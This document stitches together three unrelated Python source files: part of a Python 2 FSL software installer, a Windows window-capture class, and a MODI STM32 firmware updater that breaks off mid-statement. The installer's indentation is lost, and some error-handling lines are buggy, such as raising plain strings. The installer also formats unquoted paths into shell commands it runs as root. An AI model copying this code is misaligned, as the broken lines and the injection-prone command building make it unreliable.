# move old one out of way
MsgUser.debug("FSL version already installed")
keep_old = Settings.inst_qus.ask_question('del_old')
else:
keep_old = False
install_d = os.path.dirname(fsldir)
MsgUser.debug("Checking %s is writeable." % (install_d))
if is_writeable(install_d):
as_root = False
elif is_writeable_as_root(install_d):
as_root = True
else:
raise InstallArchiveError(
"Unable to write to target folder (%s), "
"even as a super user." % (install_d))
MsgUser.debug("Does %s require root for deletion? %s" % (
install_d, as_root))
try:
unarchive, ua_option = archive_type(archive)
except UnknownArchiveType, e:
raise InstallArchiveError(str(e))
# Generate a temporary name - eg fsl-<mypid>-date
tempname = '-'.join(('fsl', str(os.getpid()), str(time.time())))
tempfolder = os.path.join(install_d, tempname)
try:
run_cmd_dropstdout("mkdir %s" % (tempfolder), as_root=as_root)
except RunCommandError, e:
raise InstallArchiveError(
"Unable to create folder to install into.")
MsgUser.debug(
"Unpacking %s into folder %s." % (archive, tempfolder))
try:
if unarchive == 'tar':
unpack_cmd = 'tar -C %s -x %s -o -f %s' % (
tempfolder, ua_option, archive)
elif unarchive == 'zip':
MsgUser.debug(
"Calling unzip %s %s" % (ua_option, archive)
)
            unpack_cmd = 'unzip %s %s -d %s' % (ua_option, archive, tempfolder)
try:
run_cmd_dropstdout(unpack_cmd, as_root=as_root)
except RunCommandError, e:
raise InstallArchiveError("Unable to unpack FSL.")
new_fsl = os.path.join(tempfolder, 'fsl')
if os.path.exists(fsldir):
# move old one out of way
try:
old_version = get_installed_version(fsldir)
except (NotAFslVersion, GetInstalledVersionError), e:
                old_version = Version('0.0.0')
                if keep_old:
MsgUser.warning(
"The contents of %s doesn't look like an "
"FSL installation! - "
"moving to fsl-0.0.0" % (fsldir))
old_fsl = '-'.join((fsldir, str(old_version)))
if os.path.exists(old_fsl):
MsgUser.debug(
"Looks like there is another copy of the "
"old version of FSL - deleting...")
try:
safe_delete(old_fsl, as_root)
except SafeDeleteError, e:
raise InstallError(
";".join((
"Install location already has a "
"%s - I've tried to delete it but"
" failed" % (old_fsl), str(e))))
if keep_old:
try:
MsgUser.debug(
"Moving %s to %s" % (fsldir, old_fsl))
move(fsldir, old_fsl, as_root)
MsgUser.message(
'''You can find your archived version of FSL in %s.
If you wish to restore it, remove %s and rename %s to %s''' % (
old_fsl, fsldir, old_fsl, fsldir))
except MoveError, mv_e:
# failed to move the old version
MsgUser.debug(
"Failed to move old version "
"- %s" % (str(mv_e)))
raise InstallError(
"Failed to backup old version (%s)" % (str(mv_e)))
else:
MsgUser.debug("Removing existing FSL install")
try:
safe_delete(fsldir, as_root)
MsgUser.debug("Deleted %s." % (fsldir))
except SafeDeleteError, e:
raise InstallError(
"Failed to delete %s - %s." % (fsldir, str(e)))
else:
old_fsl = ''
try:
MsgUser.debug("Moving %s to %s" % (new_fsl, fsldir))
move(new_fsl, fsldir, as_root)
except MoveError, e:
# Unable to move new install into place
MsgUser.debug(
"Move failed - %s." % (str(e)))
raise InstallError(
'Failed to move new version into place.')
except InstallError, e:
clean_up_temp()
raise InstallArchiveError(str(e))
clean_up_temp()
MsgUser.debug("Install complete")
MsgUser.ok("FSL software installed.")
return fsldir
def check_for_updates(url, fsldir, requested_v=None):
# Start an update
MsgUser.message("Looking for new version.")
try:
this_version = get_installed_version(fsldir)
except GetInstalledVersionError, e:
# We can't find an installed version of FSL!
raise InstallError(str(e))
else:
MsgUser.debug("You have version %s" % (this_version))
if not requested_v:
version = Version(latest_release(url)['version'])
else:
try:
version = Version(requested_v)
except NotAFslVersion:
raise InstallError(
"%s doesn't look like a version" % requested_v)
if version > this_version:
# Update Available
if version.major > this_version.major:
# We don't support patching between major
# versions so download a fresh copy
return (UPGRADE, version)
else:
return (UPDATE, version)
else:
return (CURRENT, None)
class MakeApplicationLinksError(Exception):
def __init__(self, *args):
super(MakeApplicationLinksError, self).__init__(*args)
try:
self.app_messages = args[0]
except IndexError:
self.app_messages = []
def make_applications_links(fsldir, apps):
'''Create symlinks in /Applications'''
MsgUser.message("Creating Application links...")
results = {}
for app in apps:
app_location = os.path.join('/Applications', os.path.basename(app))
app_target = os.path.join(fsldir, app)
create_link = True
MsgUser.debug("Looking for existing link %s" % (app_location))
if os.path.lexists(app_location):
MsgUser.debug(
"Is a link: %s; realpath: %s" % (
os.path.islink(app_location),
os.path.realpath(app_location)))
if os.path.islink(app_location):
MsgUser.debug("A link already exists.")
if os.path.realpath(app_location) != app_target:
MsgUser.debug(
"Deleting old (incorrect) link %s" % (app_location))
try:
run_cmd_dropstdout("rm " + app_location, as_root=True)
except RunCommandError, e:
MsgUser.debug(
"Unable to remove broken"
" link to %s (%s)." % (app_target, str(e)))
results[app] = 'Unable to remove broken link to %s' % (
app_target)
create_link = False
else:
MsgUser.debug("Link is correct, skipping.")
create_link = False
else:
MsgUser.debug(
"%s doesn't look like a symlink, "
"so let's not delete it." % (app_location))
results[app] = (
"%s is not a link so hasn't been updated to point at the "
"new FSL install.") % (app_location)
create_link = False
if create_link:
MsgUser.debug('Create a link for %s' % (app))
if os.path.exists(app_target):
try:
run_cmd_dropstdout(
"ln -s %s %s" % (app_target, app_location),
as_root=True)
except RunCommandError, e:
MsgUser.debug(
"Unable to create link to %s (%s)." % (
app_target, str(e)))
results[app] = (
'Unable to create link to %s.') % (app_target)
else:
MsgUser.debug(
'Unable to find application'
                    ' %s to link to.' % (app_target))
if results:
raise MakeApplicationLinksError(results)
class CheckX11Warning(Exception):
pass
def check_X11(x11):
'''Function to find X11 install on Mac OS X and confirm it is compatible.
Advise user to download Xquartz if necessary'''
MsgUser.message(
"Checking for X11 windowing system (required for FSL GUIs).")
xbin = ''
for x in x11['apps']:
if os.path.exists(os.path.join(x11['location'], x)):
xbin = x
if xbin != '':
# Find out what version is installed
x_v_cmd = [
'/usr/bin/mdls', '-name',
'kMDItemVersion', os.path.join(x11['location'], xbin)]
try:
cmd = Popen(x_v_cmd, stdout=PIPE, stderr=STDOUT)
(vstring, _) = cmd.communicate()
except Exception, e:
raise CheckX11Warning(
"Unable to check X11 version (%s)" % (str(e)))
if cmd.returncode:
MsgUser.debug("Error finding the version of X11 (%s)" % (vstring))
# App found, but can't tell version, warn the user
raise CheckX11Warning(
"X11 (required for FSL GUIs) is installed but I"
" can't tell what the version is.")
else:
# Returns:
# kMDItemVersion = "2.3.6"\n
(_, _, version) = vstring.strip().split()
if version.startswith('"'):
version = version[1:-1]
if version in x11['bad_versions']:
raise CheckX11Warning(
"X11 (required for FSL GUIs) is a version that"
" is known to cause problems. We suggest you"
" upgrade to the latest XQuartz release from "
"%s" % (x11['download_url']))
else:
MsgUser.debug(
"X11 found and is not a bad version"
" (%s: %s)." % (xbin, version))
else:
# No X11 found, warn the user
raise CheckX11Warning(
"The FSL GUIs require the X11 window system which I can't"
" find in the usual places. You can download a copy from %s"
" - you will need to install this before the GUIs will"
" function" % (x11['download_url']))
def do_install(options, settings):
MsgUser.message(
shell_colours.bold + settings.title + shell_colours.default)
if options.test_installer:
settings.main_mirror = options.test_installer
this_computer = Host
if not this_computer.supported:
MsgUser.debug("Unsupported host %s %s %s" % (
this_computer.o_s,
this_computer.arch,
this_computer.os_type))
raise InstallError(
"Unsupported host - you could try building from source")
if this_computer.o_s == "linux":
system_environment = True
with_matlab = False
application_links = False
x11 = False
elif this_computer.o_s == "darwin":
system_environment = False
with_matlab = True
application_links = True
x11 = True
else:
MsgUser.debug("Unrecognised OS %s" % (this_computer.o_s))
raise InstallError("Unrecognised OS")
my_uid = os.getuid()
def configure_environment(fsldir, env_all=False, skip=False, matlab=False):
if skip:
return
if env_all:
if system_environment:
# Setup the system-wise environment
try:
setup_system_environment(fsldir)
except SetupEnvironmentError, e:
MsgUser.debug(str(e))
MsgUser.failed(
"Failed to configure system-wide profiles "
"with FSL settings: " % (str(e)))
except SetupEnvironmentSkip, e:
MsgUser.skipped(
"Some shells already configured: " % (str(e)))
else:
MsgUser.debug("System-wide profiles setup.")
MsgUser.ok("System-wide FSL configuration complete.")
else:
MsgUser.skipped(
"System-wide profiles not supported on this OS")
elif my_uid != 0:
# Setup the environment for the current user
try:
                setup_environment(fsldir, with_matlab=matlab)
except SetupEnvironmentError, e:
MsgUser.debug(str(e))
MsgUser.failed(str(e))
else:
MsgUser.ok(
"User profile updated with FSL settings, you will need "
"to log out and back in to use the FSL tools.")
if my_uid != 0:
if options.quiet:
settings.inst_qus.defaults = True
print '''
We may need administrator rights, but you have specified fully automated
mode - you may still be asked for an admin password if required.'''
print '''
To install fully automatically, either ensure this is running as the root
user (use sudo) or that you can write to the folder you wish to install
FSL in.'''
elif (not options.download and
not options.list_versions and
not options.get_source and
not options.get_feeds):
MsgUser.warning(
            '''Some operations of the installer require administrative rights,
for example installing into the default folder of /usr/local.
If your account is an 'Administrator' (you have 'sudo' rights)
then you will be prompted for your administrator password
when necessary.''')
if not options.d_dir and options.quiet:
raise InstallError(
"Quiet mode requires you to specify the install location"
" (e.g. /usr/local)")
if not options.quiet:
MsgUser.message(
"When asked a question, the default answer is given in square "
"brackets.\nHit the Enter key to accept this default answer.")
if options.env_only and my_uid != 0:
configure_environment(
get_fsldir(specified_dir=options.d_dir),
options.env_all)
return
if options.archive:
if not options.skipchecksum:
if not options.checksum:
raise InstallError(
"No checksum provided and checking not disabled")
else:
checksummer = globals()[options.checksum_type + 'File']
if options.checksum != checksummer(options.archive):
raise InstallError("FSL archive doesn't match checksum")
else:
MsgUser.ok("FSL Package looks good")
arc_version = archive_version(options.archive)
MsgUser.message(
"Installing FSL software version %s..." % (arc_version))
fsldir = install_archive(
archive=options.archive, fsldir=options.d_dir)
try:
post_install(fsldir=fsldir, settings=settings, quiet=options.quiet)
except PostInstallError, e:
raise InstallError(str(e))
configure_environment(
fsldir=fsldir, env_all=options.env_all,
skip=options.skip_env, matlab=with_matlab)
return
# All the following options require the Internet...
try:
settings.mirror = fastest_mirror(
settings.mirrors, settings.mirrors_file)
except SiteNotResponding, e:
# We can't find the FSL site - possibly the internet is down
raise InstallError(e)
try:
self_update(settings.mirror)
except SelfUpdateError, e:
MsgUser.debug("Self update error: %s" % (str(e)))
MsgUser.warning("Error checking for updates to installer - continuing")
if options.list_versions:
# Download a list of available downloads from the webserver
list_releases(settings.mirror)
return
if options.download:
MsgUser.debug("Attempting to download latest release")
try:
download_release(request_version=options.requestversion,
skip_verify=options.skipchecksum)
except DownloadFileError, e:
raise("Unable to download release %s" % (str(e)))
return
if options.update:
fsldir = get_fsldir()
status, new_v = check_for_updates(settings.mirror, fsldir=fsldir)
if status == UPDATE:
MsgUser.ok("Version %s available." % new_v)
if not settings.inst_qus.ask_question('update'):
return
elif status == UPGRADE:
MsgUser.ok("Version %s available." % new_v)
if not settings.inst_qus.ask_question('upgrade'):
return
else:
MsgUser.ok("FSL is up-to-date.")
return
if options.get_source:
MsgUser.debug("Attempting to download source")
try:
download_release(
request_version=options.requestversion,
skip_verify=options.skipchecksum,
source_code=True)
except DownloadFileError, e:
raise("Unable to download source code %s" % (str(e)))
return
if options.get_feeds:
MsgUser.debug("Attempting to download FEEDS")
try:
download_release(
request_version=options.requestversion,
skip_verify=options.skipchecksum,
feeds=True)
except DownloadFileError, e:
raise("Unable to download FEEDS %s" % (str(e)))
return
try:
fsldir = get_fsldir(specified_dir=options.d_dir, install=True)
if os.path.exists(fsldir):
(version, details) = get_web_version_and_details(
request_version=options.requestversion
)
inst_version = get_installed_version(fsldir)
if inst_version == version:
reinstall = Settings.inst_qus.ask_question('version_match')
if not reinstall:
return
(fname, version, details) = download_release(
to_temp=True,
request_version=options.requestversion,
skip_verify=options.skipchecksum)
if not details['supported']:
MsgUser.debug(
"This OS is not officially supported -"
" you may experience issues"
)
MsgUser.debug(
"Installing %s from %s (details: %s)" % (fname, version, details))
MsgUser.message(
"Installing FSL software version %s..." % (version))
install_archive(
archive=fname, fsldir=fsldir)
try:
safe_delete(fname)
except SafeDeleteError, e:
MsgUser.debug(
"Unable to delete downloaded package %s ; %s" % (
fname, str(e)))
if details['notes']:
MsgUser.message(details['notes'])
try:
post_install(
fsldir=fsldir, settings=settings,
quiet=options.quiet, x11=x11,
app_links=application_links)
except PostInstallError, e:
raise InstallError(str(e))
except DownloadError, e:
MsgUser.debug("Unable to download FSL %s" % (str(e)))
raise InstallError("Unable to download FSL")
except InstallArchiveError, e:
MsgUser.debug("Unable to unpack FSL ; %s" % (str(e)))
raise InstallError("Unable to unpack FSL - %s" % (str(e)))
configure_environment(
fsldir=fsldir, env_all=options.env_all,
skip=options.skip_env, matlab=with_matlab)
if details['notes']:
MsgUser.message(details['notes'])
def parse_options(args):
usage = "usage: %prog [options]"
ver = "%%prog %s" % (version)
parser = OptionParser(usage=usage, version=ver)
parser.add_option("-d", "--dest", dest="d_dir",
help="Install into folder given by DESTDIR - "
"e.g. /usr/local/fsl",
metavar="DESTDIR", action="store",
type="string")
parser.add_option("-e", dest="env_only",
help="Only setup/update your environment",
action="store_true")
parser.add_option("-E", dest="env_all",
help="Setup/update the environment for ALL users",
action="store_true")
parser.add_option("-v", help="Print version number and exit",
action="version")
parser.add_option("-c", "--checkupdate", dest='update',
help="Check for FSL updates -"
" needs an internet connection",
action="store_true")
parser.add_option("-o", "--downloadonly", dest="download",
help=SUPPRESS_HELP,
action="store_true")
advanced_group = OptionGroup(
parser, "Advanced Install Options",
"These are advanced install options")
advanced_group.add_option(
"-l", "--listversions", dest="list_versions",
help="List available versions of FSL",
action="store_true")
advanced_group.add_option(
"-V", "--fslversion", dest="requestversion",
help="Download the specific version FSLVERSION of FSL",
metavar="FSLVERSION", action="store",
type="string")
advanced_group.add_option(
"-s", "--source", dest="get_source",
help="Download source code for FSL",
action="store_true")
advanced_group.add_option(
"-F", "--feeds", dest="get_feeds",
help="Download FEEDS",
action="store_true")
advanced_group.add_option(
"-q", "--quiet", dest='quiet',
help="Silence all messages - useful if scripting install",
action="store_true")
advanced_group.add_option(
"-p", dest="skip_env",
help="Don't setup the environment",
action="store_true")
parser.add_option_group(advanced_group)
debug_group = OptionGroup(
parser, "Debugging Options",
"These are for use if you have a problem running this installer.")
debug_group.add_option(
"-f", "--file", dest="archive",
help=SUPPRESS_HELP,
metavar="ARCHIVEFILE", action="store",
type="string")
debug_group.add_option(
"-C", "--checksum", dest="checksum",
help=SUPPRESS_HELP,
metavar="CHECKSUM", action="store",
type="string")
debug_group.add_option(
"-T", "--checksum-type", dest="checksum_type",
default="sha256",
help=SUPPRESS_HELP,
action="store",
type="string")
debug_group.add_option(
"-M", "--nochecksum", dest="skipchecksum",
help=SUPPRESS_HELP,
action="store_true")
debug_group.add_option(
"-D", dest="verbose",
help="Switch on debug messages",
action="store_true")
debug_group.add_option(
"-G", dest="test_installer",
help=SUPPRESS_HELP,
action="store",
type="string")
debug_group.add_option(
"-w", dest="test_csv",
help=SUPPRESS_HELP,
action="store_true"
)
parser.add_option_group(debug_group)
return parser.parse_args(args)
if __name__ == '__main__':
(options, args) = parse_options(sys.argv[1:])
if options.verbose:
MsgUser.debugOn()
print options
if options.quiet:
MsgUser.quietOn()
if options.test_csv:
HAS_JSON = False
installer_settings = Settings()
try:
do_install(options, installer_settings)
except BadVersion, e:
MsgUser.debug(str(e))
MsgUser.failed("Unable to find requested version!")
sys.exit(1)
except (InstallError, GetFslDirError, GetInstalledVersionError), e:
MsgUser.failed(str(e))
sys.exit(1)
except UnsupportedOs, e:
MsgUser.failed(str(e))
sys.exit(1)
except KeyboardInterrupt, e:
MsgUser.message('')
MsgUser.failed("Install aborted.")
sys.exit(1)
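# Typical invocations of this installer (illustrative; the script is Python 2
# and the option names come from parse_options() above):
#
#   python <installer>.py                 # interactive install (default under /usr/local)
#   python <installer>.py -d /opt/fsl     # install into a specific folder
#   python <installer>.py -e              # only set up/update your shell environment
#   python <installer>.py -l              # list the available FSL versions
#   python <installer>.py -c              # check an existing install for updates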
|
windowcapture.py
|
from threading import Lock, Thread
import numpy as np
import win32con
import win32gui
import win32ui
class WindowCapture:
# threading properties
stopped = True
lock = None
screenshot = None
# properties
w = 0
h = 0
hwnd = None
cropped_x = 0
cropped_y = 0
offset_x = 0
offset_y = 0
# constructor
def __init__(self, window_name=None, cut_window=1):
# create a thread lock object
self.lock = Lock()
# find the handle for the window we want to capture.
# if no window name is given, capture the entire screen
if window_name is None:
self.hwnd = win32gui.GetDesktopWindow()
else:
self.hwnd = win32gui.FindWindow(None, window_name)
if not self.hwnd:
raise Exception("Window not found: {}".format(window_name))
# get the window size
window_rect = win32gui.GetWindowRect(self.hwnd)
self.w = window_rect[2] - window_rect[0]
self.h = window_rect[3] - window_rect[1]
# account for the window border and titlebar and cut them off
border_pixels = 8 * cut_window
titlebar_pixels = 30 * cut_window
self.w = self.w - (border_pixels * 2)
self.h = self.h - titlebar_pixels - border_pixels
self.cropped_x = border_pixels
self.cropped_y = titlebar_pixels
# set the cropped coordinates offset so we can translate screenshot
# images into actual screen positions
self.offset_x = window_rect[0] + self.cropped_x
self.offset_y = window_rect[1] + self.cropped_y
def get_screenshot(self):
# get the window image data
wDC = win32gui.GetWindowDC(self.hwnd)
dcObj = win32ui.CreateDCFromHandle(wDC)
cDC = dcObj.CreateCompatibleDC()
dataBitMap = win32ui.CreateBitmap()
dataBitMap.CreateCompatibleBitmap(dcObj, self.w, self.h)
cDC.SelectObject(dataBitMap)
cDC.BitBlt(
(0, 0),
(self.w, self.h),
dcObj,
(self.cropped_x, self.cropped_y),
win32con.SRCCOPY,
)
# convert the raw data into a format opencv can read
# dataBitMap.SaveBitmapFile(cDC, 'debug.bmp')
signedIntsArray = dataBitMap.GetBitmapBits(True)
img = np.fromstring(signedIntsArray, dtype="uint8")
img.shape = (self.h, self.w, 4)
# free resources
dcObj.DeleteDC()
cDC.DeleteDC()
win32gui.ReleaseDC(self.hwnd, wDC)
win32gui.DeleteObject(dataBitMap.GetHandle())
# drop the alpha channel, or cv.matchTemplate() will throw an error like:
# error: (-215:Assertion failed) (depth == CV_8U || depth == CV_32F) && type == _templ.type()
# && _img.dims() <= 2 in function 'cv::matchTemplate'
img = img[..., :3]
# make image C_CONTIGUOUS to avoid errors that look like:
# File ... in draw_rectangles
# TypeError: an integer is required (got type tuple)
# see the discussion here:
# https://github.com/opencv/opencv/issues/14866#issuecomment-580207109
img = np.ascontiguousarray(img)
return img
# find the name of the window you're interested in.
# once you have it, update window_capture()
# https://stackoverflow.com/questions/55547940/how-to-get-a-list-of-the-name-of-every-open-window
@staticmethod
def list_window_names():
window_list = []
def winEnumHandler(hwnd, ctx):
if win32gui.IsWindowVisible(hwnd):
print(hex(hwnd), win32gui.GetWindowText(hwnd))
window_list.append(win32gui.GetWindowText(hwnd))
win32gui.EnumWindows(winEnumHandler, None)
return window_list
# translate a pixel position on a screenshot image to a pixel position on the screen.
# pos = (x, y)
# WARNING: if you move the window being captured after execution is started, this will
# return incorrect coordinates, because the window position is only calculated in
# the __init__ constructor.
def get_screen_position(self, pos):
return (pos[0] + self.offset_x, pos[1] + self.offset_y)
# threading methods
def start(self):
self.stopped = False
t = Thread(target=self.run)
t.start()
def stop(self):
self.stopped = True
def run(self):
# TODO: you can write your own time/iterations calculation to determine how fast this is
while not self.stopped:
# get an updated image of the game
screenshot = self.get_screenshot()
# lock the thread while updating the results
self.lock.acquire()
self.screenshot = screenshot
self.lock.release()
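# A minimal usage sketch (not part of the class above). It assumes a window
# titled "Calculator" is open and that OpenCV (cv2) is installed; adjust the
# window title to whatever you actually want to capture.
if __name__ == '__main__':
    import cv2 as cv

    # print the titles of every visible window so you can pick one
    WindowCapture.list_window_names()

    # grab frames from the named window and preview them until 'q' is pressed
    wincap = WindowCapture('Calculator')
    while True:
        frame = wincap.get_screenshot()
        cv.imshow('Capture preview', frame)
        if cv.waitKey(1) == ord('q'):
            cv.destroyAllWindows()
            break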
|
firmware_updater.py
|
import io
import sys
import time
import json
import serial
import zipfile
import threading as th
import urllib.request as ur
from os import path
from io import open
from base64 import b64encode, b64decode
from importlib import import_module as im
from urllib.error import URLError
from modi.module.module import Module
from modi.util.message_util import unpack_data, decode_message, parse_message
from modi.util.connection_util import list_modi_ports, is_on_pi
from modi.util.miscellaneous_util import get_module_type_from_uuid
class STM32FirmwareUpdater:
"""STM32 Firmware Updater: Updates a firmware of given module"""
NO_ERROR = 0
UPDATE_READY = 1
WRITE_FAIL = 2
VERIFY_FAIL = 3
CRC_ERROR = 4
CRC_COMPLETE = 5
ERASE_ERROR = 6
ERASE_COMPLETE = 7
def __init__(
self, is_os_update=True, target_ids=(0xFFF, ), conn_type='ser'
):
self.conn_type = conn_type
self.update_network_base = False
self.__conn = self.__open_conn()
self.__conn.open_conn()
th.Thread(target=self.__read_conn, daemon=True).start()
self.__target_ids = target_ids
self.response_flag = False
self.response_error_flag = False
self.response_error_count = 0
self.__running = True
self.__is_os_update = is_os_update
self.update_event = th.Event()
self.update_in_progress = False
self.modules_to_update = []
self.modules_updated = []
self.network_id = None
self.ui = None
self.request_network_id()
def __del__(self):
try:
self.close()
except Exception as e:
print('Magic del is called with an exception:', e)
def set_ui(self, ui):
self.ui = ui
def request_network_id(self):
self.__conn.send_nowait(
parse_message(0x28, 0xFFF, 0xFFF, (0xFF, 0x0F))
)
def __assign_network_id(self, sid, data):
module_uuid = unpack_data(data, (6, 1))[0]
module_type = get_module_type_from_uuid(module_uuid)
if module_type == 'network':
self.network_id = sid
def update_module_firmware(self, update_network_base=False):
if update_network_base:
self.update_network_base = True
# Retrieve the network id only and update it accordingly
timeout, delay = 3, 0.1
while not self.network_id:
if timeout <= 0:
if not self.update_in_progress:
print(
'Could not retrieve network id, '
'broadcast id will be used instead.'
)
self.network_id = 0xFFF
break
self.request_network_id()
timeout -= delay
time.sleep(delay)
"""
If network id could not be retrieved, it's probably the case that
the network is already in the update progress. As such, we skip to
request to update the base firmware.
"""
if self.network_id != 0xFFF:
print(
f'Sending a request to update firmware of network '
f'({self.network_id})'
)
if not self.update_in_progress:
self.request_to_update_firmware(
self.network_id, is_network=True
)
else:
self.reset_state()
for target in self.__target_ids:
self.request_to_update_firmware(target)
self.update_event.wait()
print("Module firmwares have been updated!")
self.close()
def close(self):
self.__running = False
time.sleep(0.5)
self.__conn.close_conn()
def __open_conn(self):
if is_on_pi() and self.conn_type == 'can':
return im('modi.task.can_task').CanTask()
else:
return im('modi.task.ser_task').SerTask()
    def _reconnect_serial_connection(self, modi_num):
        # Wait for the network module to be unplugged and plugged back in,
        # then re-open the serial connection.
        disconnect = False
        while True:
            time.sleep(0.1)
            if not list_modi_ports():
                disconnect = True
            if disconnect and modi_num == len(list_modi_ports()):
                self.__reinitialize_serial_connection()
                break
def reinitialize_serial_connection(self, mode=1):
if self.ui and self.update_network_base and mode == 2:
modi_num = len(list_modi_ports())
if self.ui.is_english:
self.ui.update_network_stm32.setText(
"Reconnect network module and "
"click the button again please."
)
else:
self.ui.update_network_stm32.setText(
"네트워크 모듈을 재연결 후 버튼을 다시 눌러주십시오."
)
th.Thread(
target=self._reconnect_serial_connection,
args=(modi_num,),
daemon=True
).start()
else:
self.__reinitialize_serial_connection()
def __reinitialize_serial_connection(self):
        print('Temporarily disconnecting the serial connection...')
self.close()
time.sleep(2)
print('Re-init serial connection for the update, in 2 seconds...')
self.__conn = self.__open_conn()
self.__conn.open_conn()
self.__running = True
th.Thread(target=self.__read_conn, daemon=True).start()
def reset_state(self, update_in_progress: bool = False) -> None:
self.response_flag = False
self.response_error_flag = False
self.response_error_count = 0
self.update_in_progress = False
if not update_in_progress:
print('Make sure you have connected module(s) to update')
print("Resetting firmware updater's state")
self.modules_to_update = []
self.modules_updated = []
def request_to_update_firmware(self, module_id, is_network=False) -> None:
# Remove firmware of MODI modules (Removes EndFlash)
if is_network:
firmware_update_message = self.__set_network_state(
module_id, 4, Module.PNP_OFF
)
self.__conn.send_nowait(firmware_update_message)
self.reinitialize_serial_connection(2)
else:
firmware_update_message = self.__set_module_state(
module_id, Module.UPDATE_FIRMWARE, Module.PNP_OFF
)
self.__conn.send_nowait(firmware_update_message)
print('Firmware update has been requested')
def check_to_update_firmware(self, module_id: int) -> None:
firmware_update_ready_message = self.__set_module_state(
module_id, Module.UPDATE_FIRMWARE_READY, Module.PNP_OFF
)
self.__conn.send_nowait(firmware_update_ready_message)
def add_to_waitlist(self, module_id: int, module_type: str) -> None:
# Check if input module already exist in the list
for curr_module_id, curr_module_type in self.modules_to_update:
if module_id == curr_module_id:
return
# Check if module is already updated
for curr_module_id, curr_module_type in self.modules_updated:
if module_id == curr_module_id:
return
print(f"Adding {module_type} ({module_id}) to waiting list..."
f"{' ' * 60}")
# Add the module to the waiting list
module_elem = module_id, module_type
self.modules_to_update.append(module_elem)
def update_module(self, module_id: int, module_type: str) -> None:
if self.update_in_progress:
return
self.update_in_progress = True
updater_thread = th.Thread(
target=self.__update_firmware, args=(module_id, module_type)
)
updater_thread.daemon = True
updater_thread.start()
def update_response(self, response: bool,
is_error_response: bool = False) -> None:
if not is_error_response:
self.response_flag = response
else:
self.response_error_flag = response
def __update_firmware(self, module_id: int, module_type: str) -> None:
self.update_in_progress = True
self.modules_updated.append((module_id, module_type))
# Init base root_path, utilizing local binary files
root_path = (
path.join(
path.dirname(__file__),
'..', 'assets', 'firmware', 'stm32'
)
)
if self.__is_os_update:
if self.ui:
if self.update_network_base:
root_path = (
'https://download.luxrobo.com/modi-network-os'
)
zip_path = root_path + '/network.zip'
bin_path = 'network.bin'
else:
root_path = (
'https://download.luxrobo.com/modi-skeleton-mobile'
)
zip_path = root_path + '/skeleton.zip'
bin_path = (
path.join(f'skeleton/{module_type.lower()}.bin')
if module_type != 'env' else
path.join('skeleton/environment.bin')
)
try:
with ur.urlopen(zip_path, timeout=5) as conn:
download_response = conn.read()
except URLError:
raise URLError(
"Failed to download firmware. Check your internet."
)
zip_content = zipfile.ZipFile(
io.BytesIO(download_response), 'r'
)
bin_buffer = zip_content.read(bin_path)
else:
bin_path = path.join(root_path, f"{module_type.lower()}.bin")
with open(bin_path, 'rb') as bin_file:
bin_buffer = bin_file.read()
# Init metadata of the bytes loaded
page_size = 0x800
flash_memory_addr = 0x08000000
bin_size = sys.getsizeof(bin_buffer)
bin_begin = 0x9000 if not self.update_network_base else page_size
bin_end = bin_size - ((bin_size - bin_begin) % page_size)
page_offset = 0 if not self.update_network_base else 0x8800
for page_begin in range(bin_begin, bin_end + 1, page_size):
progress = 100 * page_begin // bin_end
if self.ui:
if self.update_network_base:
if self.ui.is_english:
self.ui.update_network_stm32.setText(
f"Network STM32 update is in progress. "
f"({progress}%)"
)
else:
self.ui.update_network_stm32.setText(
f"네트워크 모듈 초기화가 진행중입니다. "
f"({progress}%)"
)
else:
if self.ui.is_english:
self.ui.update_stm32_modules.setText(
f"STM32 modules update is in progress. "
f"({progress}%)"
)
else:
self.ui.update_stm32_modules.setText(
f"모듈 초기화가 진행중입니다. ({progress}%)"
)
print(
f"\rUpdating {module_type} ({module_id}) "
f"{self.__progress_bar(page_begin, bin_end)} "
f"{progress}%", end=''
)
page_end = page_begin + page_size
curr_page = bin_buffer[page_begin:page_end]
# Skip current page if empty
if not sum(curr_page):
continue
# Erase page (send erase request and receive its response)
erase_page_success = self.send_firmware_command(
oper_type="erase", module_id=module_id, crc_val=0,
dest_addr=flash_memory_addr,
page_addr=page_begin + page_offset
)
if not erase_page_success:
page_begin -= page_size
continue
# Copy current page data to the module's memory
checksum = 0
for curr_ptr in range(0, page_size, 8):
if page_begin + curr_ptr >= bin_size:
break
curr_data = curr_page[curr_ptr:curr_ptr + 8]
checksum = self.send_firmware_data(
module_id,
seq_num=curr_ptr // 8,
bin_data=curr_data,
crc_val=checksum
)
self.__delay(0.002)
# CRC on current page (send CRC request / receive CRC response)
crc_page_success = self.send_firmware_command(
oper_type="crc", module_id=module_id, crc_val=checksum,
dest_addr=flash_memory_addr,
page_addr=page_begin + page_offset
)
if not crc_page_success:
page_begin -= page_size
time.sleep(0.01)
print(
f"\rUpdating {module_type} ({module_id}) "
f"{self.__progress_bar(1, 1)} 100%"
)
# Get version info from version_path, using appropriate methods
version_info, version_file = None, 'version.txt'
if self.ui:
version_path = root_path + '/' + version_file
for line in ur.urlopen(version_path, timeout=5):
                version_info = line.decode('utf-8').lstrip('v').rstrip('\n')
else:
if self.update_network_base:
version_file = 'base_' + version_file
version_path = root_path + '/' + version_file
with open(version_path) as version_file:
version_info = version_file.readline().lstrip('v').rstrip('\n')
version_digits = [int(digit) for digit in version_info.split('.')]
""" Version number is formed by concatenating all three version bits
e.g. 2.2.4 -> 010 00010 00000100 -> 0100 0010 0000 0100
"""
version = (
version_digits[0] << 13 |
version_digits[1] << 8 |
version_digits[2]
)
# Set end-flash data to be sent at the end of the firmware update
end_flash_data = bytearray(8)
end_flash_data[0] = 0xAA
end_flash_data[6] = version & 0xFF
end_flash_data[7] = (version >> 8) & 0xFF
self.send_end_flash_data(module_type, module_id, end_flash_data)
print(
f'Version info (v{version_info}) has been written to its firmware!'
)
# Firmware update flag down, resetting used flags
print(f'Firmware update is done for {module_type} ({module_id})')
self.reset_state(update_in_progress=True)
if self.modules_to_update:
print("Processing the next module to update the firmware..")
next_module_id, next_module_type = self.modules_to_update.pop(0)
self.__update_firmware(next_module_id, next_module_type)
else:
# Reboot all connected modules
reboot_message = self.__set_module_state(
0xFFF, Module.REBOOT, Module.PNP_OFF
)
self.__conn.send_nowait(reboot_message)
print("Reboot message has been sent to all connected modules")
self.reset_state()
if self.update_network_base:
self.reinitialize_serial_connection(1)
time.sleep(0.5)
time.sleep(1)
self.update_in_progress = False
self.update_event.set()
if self.ui:
if self.update_network_base:
self.ui.update_stm32_modules.setStyleSheet(
f'border-image: url({self.ui.active_path})'
)
self.ui.update_stm32_modules.setEnabled(True)
if self.ui.is_english:
self.ui.update_network_stm32.setText(
